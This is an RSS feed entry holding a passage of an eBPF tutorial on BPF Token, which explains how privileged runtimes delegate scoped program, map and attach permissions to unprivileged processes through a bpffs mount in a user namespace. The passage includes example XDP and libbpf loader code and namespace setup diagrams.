<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: 云微</title>
    <description>The latest articles on Forem by 云微 (@yunwei37).</description>
    <link>https://forem.com/yunwei37</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1139584%2F27142ebf-c0a3-449b-9482-d63e79238a26.jpeg</url>
      <title>Forem: 云微</title>
      <link>https://forem.com/yunwei37</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/yunwei37"/>
    <language>en</language>
    <item>
      <title>eBPF Tutorial by Example: BPF Token for Delegated Privilege and Secure Program Loading</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 17 Mar 2026 07:48:37 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-token-for-delegated-privilege-and-secure-program-loading-3b5i</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-token-for-delegated-privilege-and-secure-program-loading-3b5i</guid>
      <description>&lt;p&gt;Ever needed to let a container or CI job load an eBPF program without giving it full &lt;code&gt;CAP_BPF&lt;/code&gt; or &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt;? Or wanted to expose XDP packet processing to a tenant workload while ensuring it can only create the specific map types and program types you've approved? Before BPF token, the answer was binary: either you had the capabilities to do &lt;em&gt;everything&lt;/em&gt; in BPF, or you could do &lt;em&gt;nothing&lt;/em&gt;. There was no middle ground.&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Token&lt;/strong&gt; solves. Introduced by Andrii Nakryiko and merged in Linux 6.9, BPF token is a delegation mechanism that lets a privileged process (like a container runtime or systemd) create a precisely scoped permission set for BPF operations, then hand it to an unprivileged process through a bpffs mount. The unprivileged process can load programs, create maps, and attach hooks, but only the types that were explicitly allowed. No broad capabilities required.&lt;/p&gt;

&lt;p&gt;In this tutorial, we'll set up a delegated bpffs mount in a user namespace, derive a BPF token from it, and use libbpf to load and attach a minimal XDP program, all from a process that holds no BPF capabilities in the initial user namespace.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_token" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_token&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Token: Solving the Privilege Problem
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: All-or-Nothing BPF Capabilities
&lt;/h3&gt;

&lt;p&gt;Traditional eBPF requires &lt;code&gt;CAP_BPF&lt;/code&gt; for program loading and map creation, plus additional capabilities like &lt;code&gt;CAP_PERFMON&lt;/code&gt; for tracing, &lt;code&gt;CAP_NET_ADMIN&lt;/code&gt; for networking hooks, and &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; for certain advanced operations. These capabilities are inherently &lt;strong&gt;system-wide&lt;/strong&gt;: you cannot namespace or sandbox &lt;code&gt;CAP_BPF&lt;/code&gt;. As the kernel documentation explains, this is by design: BPF tracing helpers like &lt;code&gt;bpf_probe_read_kernel()&lt;/code&gt; can access arbitrary kernel memory, which fundamentally cannot be scoped to a single namespace.&lt;/p&gt;

&lt;p&gt;This creates a real problem in multi-tenant environments:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Container isolation&lt;/strong&gt;: A Kubernetes pod that needs to run a simple XDP program must be given &lt;code&gt;CAP_BPF&lt;/code&gt; + &lt;code&gt;CAP_NET_ADMIN&lt;/code&gt;, which also lets it load &lt;em&gt;every&lt;/em&gt; networking program type and create &lt;em&gt;any&lt;/em&gt; map type. There's no way to say "you can load XDP programs but not tc or sockops programs."&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CI/CD pipelines&lt;/strong&gt;: A build job that tests an eBPF-based observability tool needs root-equivalent capabilities to load programs, even though the test only exercises a specific, well-known program type.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Third-party integrations&lt;/strong&gt;: A service mesh sidecar that attaches sockops programs needs host-wide capabilities; once &lt;code&gt;CAP_PERFMON&lt;/code&gt; or &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; is added for convenience, the same grant also lets it trace every process on the host.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The result is that organizations either give broad BPF capabilities (weakening their security posture) or prohibit BPF entirely in unprivileged contexts (limiting the technology's adoption).&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Scoped Delegation Through bpffs
&lt;/h3&gt;

&lt;p&gt;BPF token takes a different approach. Instead of trying to namespace capabilities (which is fundamentally unsafe for BPF), it introduces an explicit delegation model:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A &lt;strong&gt;privileged process&lt;/strong&gt; (container runtime, init system, platform daemon) creates a bpffs instance with specific delegation options that define exactly which BPF operations are allowed.&lt;/li&gt;
&lt;li&gt;The privileged process passes this bpffs mount to an &lt;strong&gt;unprivileged process&lt;/strong&gt; (container, CI job, tenant workload).&lt;/li&gt;
&lt;li&gt;The unprivileged process derives a &lt;strong&gt;BPF token&lt;/strong&gt; from the bpffs mount. The token is a file descriptor that carries the delegated permission set.&lt;/li&gt;
&lt;li&gt;When the unprivileged process makes &lt;code&gt;bpf()&lt;/code&gt; syscalls (through libbpf or directly), it passes the token fd. The kernel then checks the requested command and types against the token's delegation policy, and evaluates the capability check relative to the token's user namespace instead of the initial one.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The token is scoped along four independent axes:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Delegation Option&lt;/th&gt;
&lt;th&gt;What It Controls&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_cmds&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which &lt;code&gt;bpf()&lt;/code&gt; commands are allowed&lt;/td&gt;
&lt;td&gt;&lt;code&gt;prog_load:map_create:btf_load:link_create&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_maps&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which map types can be created&lt;/td&gt;
&lt;td&gt;&lt;code&gt;array:hash:ringbuf&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_progs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which program types can be loaded&lt;/td&gt;
&lt;td&gt;&lt;code&gt;xdp:socket_filter&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;delegate_attachs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Which attach types are allowed&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;xdp:cgroup_inet_ingress&lt;/code&gt; or &lt;code&gt;any&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each axis is a bitmask. If a bit isn't set, the corresponding operation is denied even if the token is present. This gives platform engineers fine-grained control: you can allow a container to load XDP programs with array maps but deny it access to kprobes, perf events, or hash-of-maps.&lt;/p&gt;
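&lt;p&gt;The allowlist semantics of one axis can be modeled in a few lines of shell. This is only a sketch: the kernel stores each axis as a bitmask, while the hypothetical &lt;code&gt;policy_allows&lt;/code&gt; helper below works on the colon-separated text form used in the mount options, and the lists passed to it are illustrative.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper (not part of the tutorial repository): succeeds when
# the requested type appears in a colon-separated delegation list, or when
# the list contains "any".
policy_allows() {
    list=$1
    item=$2
    case ":$list:" in
        *":any:"* | *":$item:"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the verdict for one axis.
# $1 = axis label, $2 = policy list, $3 = requested type
check() {
    if policy_allows "$2" "$3"; then
        echo "$1 $3: allowed"
    else
        echo "$1 $3: denied"
    fi
}

check prog "xdp:socket_filter" xdp
check prog "xdp:socket_filter" kprobe
check map "array" array
check map "array" hash
```

&lt;p&gt;With these lists, the script reports &lt;code&gt;xdp&lt;/code&gt; and &lt;code&gt;array&lt;/code&gt; as allowed and &lt;code&gt;kprobe&lt;/code&gt; and &lt;code&gt;hash&lt;/code&gt; as denied, which mirrors how an unset bit denies the operation even when a token is present.&lt;/p&gt;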

&lt;h3&gt;
  
  
  The User Namespace Constraint
&lt;/h3&gt;

&lt;p&gt;One critical design decision: &lt;strong&gt;a BPF token must be created inside the same user namespace as the bpffs instance, and that user namespace must not be &lt;code&gt;init_user_ns&lt;/code&gt;&lt;/strong&gt;. This is intentional. It means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A host-namespace bpffs (the one at &lt;code&gt;/sys/fs/bpf&lt;/code&gt;) does &lt;strong&gt;not&lt;/strong&gt; produce usable tokens. Tokens only work when the bpffs is associated with a non-init user namespace.&lt;/li&gt;
&lt;li&gt;The privileged parent configures the bpffs before passing it to the child, but the child (in its own user namespace) is the one that creates and uses the token.&lt;/li&gt;
&lt;li&gt;This design prevents a process with an existing token from using it to escalate privileges outside its namespace boundary.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  How libbpf Makes It Transparent
&lt;/h3&gt;

&lt;p&gt;For applications built with libbpf (which is most of them), token usage is nearly transparent. You have three options:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Explicit path&lt;/strong&gt;: Set &lt;code&gt;bpf_object_open_opts.bpf_token_path&lt;/code&gt; when opening the BPF object. libbpf will derive the token from the specified bpffs mount.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Environment variable&lt;/strong&gt;: Set &lt;code&gt;LIBBPF_BPF_TOKEN_PATH&lt;/code&gt; to point to the bpffs mount. libbpf picks it up automatically.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default path&lt;/strong&gt;: If the default &lt;code&gt;/sys/fs/bpf&lt;/code&gt; is a delegated bpffs in the current user namespace, libbpf uses it implicitly.&lt;/li&gt;
&lt;/ol&gt;
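&lt;p&gt;The three options can be read as a lookup order. The sketch below models that order in shell, assuming the explicit option takes precedence over the environment variable, which in turn takes precedence over the default path. &lt;code&gt;resolve_token_path&lt;/code&gt; and &lt;code&gt;/run/tenant/bpf&lt;/code&gt; are hypothetical names used for illustration; this is not libbpf code.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical model of the assumed lookup order:
# explicit option, then LIBBPF_BPF_TOKEN_PATH, then /sys/fs/bpf.
resolve_token_path() {
    explicit=$1
    if [ -n "$explicit" ]; then
        echo "$explicit"
    elif [ -n "${LIBBPF_BPF_TOKEN_PATH:-}" ]; then
        echo "$LIBBPF_BPF_TOKEN_PATH"
    else
        echo "/sys/fs/bpf"
    fi
}

unset LIBBPF_BPF_TOKEN_PATH
resolve_token_path ""                  # nothing set: default path

LIBBPF_BPF_TOKEN_PATH=/run/tenant/bpf
export LIBBPF_BPF_TOKEN_PATH
resolve_token_path ""                  # environment variable is used
resolve_token_path /proc/self/fd/5     # explicit option wins
```

&lt;p&gt;In practice, the environment variable is the least invasive route for an existing tool, because it requires no change to the loader's source.&lt;/p&gt;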

&lt;p&gt;Once the token is derived, libbpf passes it with every relevant &lt;code&gt;bpf()&lt;/code&gt; command (&lt;code&gt;BPF_MAP_CREATE&lt;/code&gt;, &lt;code&gt;BPF_BTF_LOAD&lt;/code&gt;, &lt;code&gt;BPF_PROG_LOAD&lt;/code&gt;, and &lt;code&gt;BPF_LINK_CREATE&lt;/code&gt;) without any source-code changes in the BPF application.&lt;/p&gt;

&lt;h2&gt;
  
  
  Writing the eBPF Program
&lt;/h2&gt;

&lt;p&gt;The BPF side of this demo is intentionally minimal: a tiny XDP program on loopback. This keeps the focus on the token workflow. Here's the complete source:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;token_stats&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;packets&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;last_ifindex&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;token_stats&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;stats_map&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"xdp"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_packet&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;xdp_md&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;token_stats&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;stats&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stats_map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;XDP_PASS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;packets&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;last_ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ingress_ifindex&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;XDP_PASS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few design choices to note:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;BPF_MAP_TYPE_ARRAY&lt;/code&gt;&lt;/strong&gt; was chosen because the delegation policy explicitly allows &lt;code&gt;array&lt;/code&gt; maps. If we had used a hash map instead, loading would fail because the token doesn't grant &lt;code&gt;hash&lt;/code&gt; map creation permission. This is the token model in action; even trivial program changes can be caught by the delegation policy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;SEC("xdp")&lt;/code&gt;&lt;/strong&gt; matches the &lt;code&gt;delegate_progs=xdp&lt;/code&gt; policy. If you changed this to &lt;code&gt;SEC("kprobe/...")&lt;/code&gt;, the kernel would reject the program at load time with &lt;code&gt;EPERM&lt;/code&gt;, because kprobe is not among the allowed program types.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;XDP_PASS&lt;/code&gt;&lt;/strong&gt; simply lets every packet through. The program's only purpose is to prove that a token-backed load and attach succeeded. In production, you'd replace this with real packet-processing logic.&lt;/p&gt;

&lt;h2&gt;
  
  
  User-Space Loader: Token-Backed Loading
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;token_trace.c&lt;/code&gt; loader is a standard libbpf skeleton program with one key addition: it passes a &lt;code&gt;bpf_token_path&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_object_open_opts&lt;/span&gt; &lt;span class="n"&gt;open_opts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;

&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bpf_token_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token_path&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token_trace_bpf__open_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;open_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From this point on, libbpf takes over. When it calls &lt;code&gt;bpf(BPF_MAP_CREATE)&lt;/code&gt; to create &lt;code&gt;stats_map&lt;/code&gt;, it includes the token fd. When it calls &lt;code&gt;bpf(BPF_PROG_LOAD)&lt;/code&gt; for the XDP program, it includes the token fd. When it calls &lt;code&gt;bpf(BPF_LINK_CREATE)&lt;/code&gt; to attach to the interface, it includes the token fd.&lt;/p&gt;

&lt;p&gt;The rest of the loader is straightforward:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token_trace_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;    &lt;span class="c1"&gt;// token used for map_create + prog_load&lt;/span&gt;
&lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_xdp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;handle_packet&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// token used for link_create&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After attaching, the loader reads the map before and after generating a test packet to verify the program executed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;before&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;// ... generate UDP packet to 127.0.0.1 ...&lt;/span&gt;
&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;after&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"delta          : %llu&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;after&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;packets&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;before&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;packets&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the delta is 1, the XDP program was successfully loaded and attached using only the permissions delegated through the token.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Namespace Orchestrator: &lt;code&gt;token_userns_demo&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Because BPF token requires a non-init user namespace, running a bare &lt;code&gt;token_trace -t /sys/fs/bpf&lt;/code&gt; on the host won't work. The &lt;code&gt;token_userns_demo.c&lt;/code&gt; wrapper automates the complex namespace choreography. Here's the full sequence:&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Fork and Create Namespaces
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;parent (root, init_user_ns)          child (unprivileged, new userns)
         │                                        │
         │   fork()                               │
         ├────────────────────────────────────────&amp;gt;│
         │                                        │
         │                            unshare(CLONE_NEWUSER)
         │                            unshare(CLONE_NEWNS | CLONE_NEWNET)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child creates a new user namespace (where it maps itself to uid/gid 0), a new mount namespace (so bpffs mounts are private), and a new network namespace (so &lt;code&gt;lo&lt;/code&gt; is a fresh interface it can attach to).&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Create bpffs and Configure Delegation
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;parent (root, init_user_ns)          child (new userns)
         │                                        │
         │                            fs_fd = fsopen("bpf", 0)
         │   &amp;lt;───── send fs_fd via SCM_RIGHTS ────│
         │                                        │
    fsconfig(fs_fd, "delegate_cmds", ...)         │  (waiting for ack)
    fsconfig(fs_fd, "delegate_maps", "array")     │
    fsconfig(fs_fd, "delegate_progs", "xdp:...")  │
    fsconfig(fs_fd, "delegate_attachs", "any")    │
    fsconfig(fs_fd, FSCONFIG_CMD_CREATE)          │
         │                                        │
         │   ───────── send ack ─────────────────&amp;gt;│
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child calls &lt;code&gt;fsopen("bpf", 0)&lt;/code&gt; to create a bpffs filesystem context in its user namespace, then sends the file descriptor to the parent via a Unix socket (&lt;code&gt;SCM_RIGHTS&lt;/code&gt;). The parent, running as root in the init namespace, configures the delegation policy with &lt;code&gt;fsconfig()&lt;/code&gt;, then materializes the filesystem with &lt;code&gt;FSCONFIG_CMD_CREATE&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This two-step dance is necessary because: (a) the bpffs must be created in the child's user namespace (for the token to be valid there), but (b) only the privileged parent can set delegation options (because those options grant BPF capabilities).&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Mount and Load
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;child (new userns)
         │
    mnt_fd = fsmount(fs_fd, 0, 0)
    token_path = "/proc/self/fd/&amp;lt;mnt_fd&amp;gt;"
    set_loopback_up()
    exec("./token_trace", "-t", token_path, "-i", "lo")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The child materializes the bpffs as a detached mount (no mount point needed, since &lt;code&gt;/proc/self/fd/&amp;lt;mnt_fd&amp;gt;&lt;/code&gt; gives a path), brings the loopback interface up in its network namespace, and &lt;code&gt;exec&lt;/code&gt;s &lt;code&gt;token_trace&lt;/code&gt; with the bpffs path. From &lt;code&gt;token_trace&lt;/code&gt;'s perspective, it's just opening a BPF object with a token path. It doesn't know or care about the namespace setup.&lt;/p&gt;

&lt;h2&gt;
  
  
  Preparing a bpffs Mount Manually
&lt;/h2&gt;

&lt;p&gt;If you want to experiment with the mount syntax outside the demo wrapper, the repository includes a helper script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
